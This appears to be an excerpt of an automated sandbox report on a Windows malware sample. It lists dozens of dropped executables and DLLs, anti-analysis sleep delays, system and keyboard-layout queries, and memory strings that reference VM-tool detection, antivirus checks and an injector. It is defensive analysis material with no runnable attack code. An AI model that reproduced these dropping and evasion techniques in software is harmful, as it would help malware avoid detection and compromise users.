                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\ugGFIzLnD3Xk89zL7XSYeDGh.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\IsEPzSszgrCYUPQvHPDrLyFU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\ra8RK0HZwqsQsFKuKAOljczn.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\CzCAVDbVcAMwrBna8hMGEVEa.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\0Bos1rjatCgxKDAqeI5gMROw.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\appidpolicyconverter.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Fh7qhqxo9lqcq8fZJGpCZFiC.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\hK1ls0Ofsd3l9PBQOnBvFrY4.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\060[1].exe
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_package
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\GyEiPhmZ7wFSCYXwTgsPkluJ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\nMCfbx6hx0DUWGYJuDAMUAIJ.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\cad54ba5b01423b1af8ec10ab5719d97[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\3CfyWUQfEPMLfwgMw9RKzj9q.exe
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_package
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\setup[1].exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\PurfH4hAOpbVHLEkly68a3iu.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\0DWhHyQpdxsJp4gA1M0WjqnA.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\IiFh1rXOMpGB7BnxmUig3wkQ.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\urA10ZckYEEXLZZov5c00RO_.exe
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\HDCJLf7pYcxae1KSycA6A5eR.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\1CGwy9Tr3ZgPn871BvByOPxR.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\sJ72s0PpaBNUmYNiHyJZFP9z.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\jZXBdg5rull5j6LgJCWVgVos.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\WjXPtwNxqwEpWrekfMAFvnPV.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\PuQVr13ObJzLxhvCkSK1EXB6.exe
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\01ySZukOlUcP5NF6FSceJyuX.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\62dRoO3BlNtGMcLNCSYzZeqJ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\2YL4IgWcBHinkIA211vO9Bpr.exe
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\ARP.EXE
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\7725eaa6592c80f8124e769b4e8a07f7[1].exe
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[2].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\Pictures\tSUKH8w2Pv8sgaLWrFPRDr1i.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\aTFJoaTi8xkup68H3WyrFIbQ.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\790489aa[1].exe
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\hh.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\s2mORnBj3q8nWakBtFzD2977.exe
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937415374172.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\timeSync[1].exe
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe API coverage: 8.3 %
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe API coverage: 8.3 %
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe API coverage: 8.3 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7504 | Thread sleep count: 6134 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7504 | Thread sleep count: 3641 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396 | Thread sleep time: -2100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599653s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599438s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -599108s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598998s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598558s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598451s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598341s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598216s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -598075s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597963s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597833s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -597031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596919s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596811s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596676s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596231s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -596015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -595771s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -595640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464 | Thread sleep time: -595530s >= -30000s
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7840 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7512 | Thread sleep count: 331 > 30
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7512 | Thread sleep time: -66200s >= -30000s
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7556 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748 | Thread sleep count: 1066 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 332 | Thread sleep count: 60 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 | Thread sleep count: 206 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe TID: 1076 | Thread sleep count: 333 > 30
Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe TID: 1076 | Thread sleep time: -1998000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exe TID: 8160 | Thread sleep count: 381 > 30
Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exe TID: 8160 | Thread sleep time: -2286000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | File Volume queried: C:\Users\user\Desktop FullSizeInformation
Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | File Volume queried: C:\Users\user\Desktop FullSizeInformation
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0041D9E1 FindFirstFileExA, 4_2_0041D9E1
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0041D9E1 FindFirstFileExA, 11_2_0041D9E1
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BCDC48 FindFirstFileExA, 11_2_05BCDC48
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0041D9E1 FindFirstFileExA, 19_2_0041D9E1
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CFDC48 FindFirstFileExA, 19_2_05CFDC48
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0041D9E1 FindFirstFileExA, 21_2_0041D9E1
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041DDC48 FindFirstFileExA, 21_2_041DDC48
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385D46F0 GetSystemInfo, GetNumaHighestNodeNumber, GetCurrentProcess, GetProcessGroupAffinity, GetLastError, GetCurrentProcess, GetProcessAffinityMask, 0_2_00007FF6385D46F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 599108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 598075
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 597031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596919
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596811
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 596015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Thread delayed: delay time: 595530
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File opened: C:\Users\user\
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
